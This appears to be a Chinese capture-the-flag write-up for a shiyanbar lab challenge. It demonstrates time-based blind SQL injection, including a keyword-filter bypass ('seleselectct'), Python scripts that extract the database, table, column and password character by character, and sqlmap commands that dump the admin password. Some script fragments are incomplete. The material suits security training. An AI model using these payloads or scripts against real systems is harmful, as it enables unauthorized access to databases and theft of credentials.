實驗吧 看起來有點難(手工註入加sqlmap註入)
嗯~打開題目看見一個逼格有點高的圖
查看網頁源代碼,表單以get的方式傳送三個參數(admin,pass,action)給index.php,但是限制了兩個輸入框的最大長度是10,這個是前端的限制,形同虛設。我們可以用按瀏覽器的F12,改變其值的大小,或者在URL欄中輸入都可以。
然後我們在輸入框中隨便輸入一點測試看會報什麽錯,或者過濾了什麽關鍵字符,我們可以輸入一些敏感的字符串。然後我們可以看見我們在admin中輸入的會打印在屏幕上。並且我們發現用戶名框把select,#過濾了,而select只是簡單的過濾,可以構造成seleselectct繞過;而且我們在用戶名輸入admin時爆的錯可以讓我們確定正確的用戶名就是admin
既然知道了用戶名,且substring,mid語句都沒有被過濾。我們開始構造註入語句看看能不能成功。
http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin‘ and sleep(5) or ‘1‘=‘0"
嗯~發現頁面等了5~6秒才顯示。說明語句執行成功了。可以註入!!
開始寫python3腳本
爆庫名
1 import requests
2 import string
3
4 gress=string.ascii_lowercase+string.ascii_uppercase+string.punctuation+string.digits
庫名是test
然後開始爆表名
1 import requests
2 import string
3
4 url = ‘http://ctf5.shiyanbar.com/web/wonderkun/index.php‘
5 str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
6 tableName=[]
7 for i in range(0,5): #假設web4中有五個表
8 Name=‘‘
9 flag2=0
10 for col in range(1,11):#假設每個表的最大長度不超過10
11 flag=0
12 for payload in str:
13 url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin‘ and case when(substr((seleselectct table_name from information_schema.tables where table_schema=‘test‘ limit 1 offset %d),%d,1)=‘%s‘) then sleep(5) else 1 end or ‘1‘=‘0" %(i,col,payload)
14 try:
15 print(url)
16 r = requests.get(url, timeout=4)
17 except:
18 flag=1
19 flag2=1
20 Name += payload
21 print("第%s個表為是%s" % (i+1,Name))
22 break
23 #tableName.append(Name)
24 if flag==0:
25 break
26 if(flag2==0):
27 break
28 tableName.append(Name)
29
30 for a in range(len(tableName)):
31 print(tableName[a])
就一張表,表名為admin
爆字段
1 import requests
2 import string
3
4 url = ‘http://ctf5.shiyanbar.com/web/wonderkun/index.php‘
5 str=string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
6 columnName=[]
7 for i in range(0,5):
8 Name=‘‘
9 flag2=0
10 for col in range(1,11):#假設每個列名的最大長度不超過10
11 flag=0
12 for payload in str:
13 url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin‘ and case when(substr((seleselectct column_name from information_schema.columns where table_name=‘admin‘ limit 1 offset %d),%d,1)=‘%s‘) then sleep(5) else 1 end or ‘1‘=‘0" % (i, col, payload)
14 try:
15 print(url)
16 r = requests.get(url, timeout=4)
17 except:
18 flag=1
19 flag2=1
20 Name += payload
21 print("第%s個字段為是%s" % (i+1,Name))
22 break
23 if flag==0:
24 break
25 if(flag2==0):
26 break
27 columnName.append(Name)
28
29 for a in range(len(columnName)):
30 print(columnName[a])
爆出字段內容
1 import requests
2 import string
3
4 gress=string.ascii_lowercase+string.ascii_uppercase+string.punctuation+string.digits
5 databaseName=‘‘
6
7 for i in range(1, 16): #假設庫名長度為15
8 for playload in gress:
9
10 url = "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin‘ and case when(substr((seleselectct password from admin),%d,1)=‘%s‘) then sleep(5) else 1 end or ‘1‘=‘0" %(i,playload)
11
12 try:
13 print("正在測試第%d個字符是否為‘%s‘"%(i,playload))
14 r = requests.get(url,timeout=4)
15 except:
16 suo=0
17 databaseName+=playload
18 print("內容為是%s"%databaseName)
19 break
20
21 print(databaseName)
OK 內容就是idnuenna。
下面用sqlmap來註入。
在sqlmap中輸入
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin"
發現是可以註入的!
開始爆庫名
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --dbs
爆表名
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --tables -D "test"
爆列名
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --columns -T "admin" -D "test"
爆內容
sqlmap.py -u "http://ctf5.shiyanbar.com/basic/inject/index.php?pass=&action=login&admin=admin" --dump -C "password" -T "admin" -D "test"
好啦,密碼已經出來啦
實驗吧 看起來有點難(手工註入加sqlmap註入)